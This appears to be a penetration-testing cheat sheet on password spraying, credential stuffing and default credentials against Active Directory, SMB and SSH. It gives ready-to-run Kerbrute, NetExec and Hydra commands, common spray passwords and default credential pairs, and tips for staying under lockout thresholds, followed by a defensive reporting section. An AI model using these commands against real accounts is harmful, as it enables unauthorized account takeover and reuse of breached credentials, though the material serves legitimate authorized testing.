🛡️ Methodology Checklist
- Spraying: one or few passwords against many users (avoid lockout)
- Credential stuffing: leaked cred pairs from breach databases
- Get exact lockout policy before spraying
- Build username list: email format, AD enum, LinkedIn, Kerbrute
- Select spray password: Season+Year (Summer2024), CompanyName+1
- Spray with Kerbrute:
kerbrute passwordspray -d [DOMAIN] --dc [DC] users.txt [PASS] - NXC spray:
nxc smb [DC] -u users.txt -p [PASS] --continue-on-success - Wait full observation window between rounds
🎯 Operational Context
Use when: Large user list available — spray common passwords at low volume across all accounts, or stuff breach credentials against all services.
Think Dumber First: Credential stuffing is the highest ROI attack — breached credential lists have 1-5% reuse rate. nxc smb [TARGET] -u emails.txt -p pass.txt --no-bruteforce --continue-on-success tries user:pass pairs without lockout. Run stuffing before spraying.
Skip when: User list unavailable — enumerate users first before any spray.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
netexec smb [SUBNET]/24 -u [USER_LIST] -p '[PASS]' | Spray single password across subnet |
hydra -C [CRED_LIST] ssh://[TARGET_IP] | Credential stuffing (-C takes user:pass format) |
pip3 install defaultcreds-cheat-sheet | Install default credential lookup tool |
creds search [PRODUCT] | Look up default creds for a product/vendor |
🔬 Deep Dive & Workflow
Password Spraying vs Brute-Force vs Stuffing
| Technique | Input | Targets | Lockout Risk |
|---|---|---|---|
| Brute-force | Many passwords → one account | Single user | High |
| Spraying | One password → many accounts | Entire org | Low |
| Stuffing | Breach pairs (user:pass) → service | Any protocol | Low |
Password Spraying
Test a single password against many accounts — exploits organizations that initialize accounts with a standard password and users who never change it.
Common spray targets: ChangeMe123!, Welcome1!, Season+Year, CompanyName1!
# Spray a single password across an entire subnet
netexec smb 10.100.38.0/24 -u users.list -p 'ChangeMe123!'Watch for (Pwn3d!) in output to identify admin-level matches. For Active Directory environments, Kerbrute is an alternative that validates against Kerberos pre-auth (no LDAP bind required, quieter).
Credential Stuffing
Reuse credentials from known breaches against the target. The -C flag in Hydra accepts user:password per line:
# user_pass.list format: "admin:password123"
hydra -C user_pass.list ssh://[TARGET_IP]Effective because users reuse passwords across personal and enterprise accounts.
Default Credentials
Devices (routers, firewalls, databases, IoT) often ship with factory credentials left unchanged.
DefaultCreds-Cheat-Sheet queries a curated database of known defaults:
pip3 install defaultcreds-cheat-sheet
creds search linksys
creds search cisco
creds search mysqlCommon defaults to try first: admin:admin, admin:password, admin:<blank>, root:root.
Attack workflow:
- Identify product/version from service banners or web login page
- Run
creds search [PRODUCT]for candidates - Build a
user:passlist from results - Spray with
hydra -C default_creds.list [PROTOCOL]://[TARGET_IP]
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Spray lockout triggered | Observation window miscalculated | Stop immediately if lockout detected; wait for window to reset; reduce spray interval to 2x policy window |
| Stuffing returns no valid creds | Breach data stale or wrong format | Normalize format: username:password one per line; try email variant if username fails |
| nxc continues after success | —continue-on-success needed | Add flag to collect all valid accounts, not just first match |
| Too many invalid users slow spray | User list too large | Validate users first via LDAP or VRFY; remove invalid users before spraying |
| Spraying AD shows ‘STATUS_ACCOUNT_RESTRICTION’ | Account valid but restricted | Account exists but has login restrictions; try other accounts; note for reporting |
📝 Reporting Trigger
Finding Title: Password Spraying Compromises Multiple Domain Accounts Impact: Low-volume password spray against all domain accounts bypasses lockout controls while compromising accounts using common passwords, providing initial or expanded AD access without triggering lockout alerts. Root Cause: Lockout threshold set high (>10 attempts) or observation window too long (>60 minutes). No anomalous authentication alerting for distributed low-volume failed authentications. Recommendation: Set lockout threshold to 3-5 attempts with 15-30 minute observation window. Implement smart lockout (Azure AD Smart Lockout, Microsoft Entra ID Protection). Alert on distributed failed auth patterns. Mandate MFA for all domain accounts.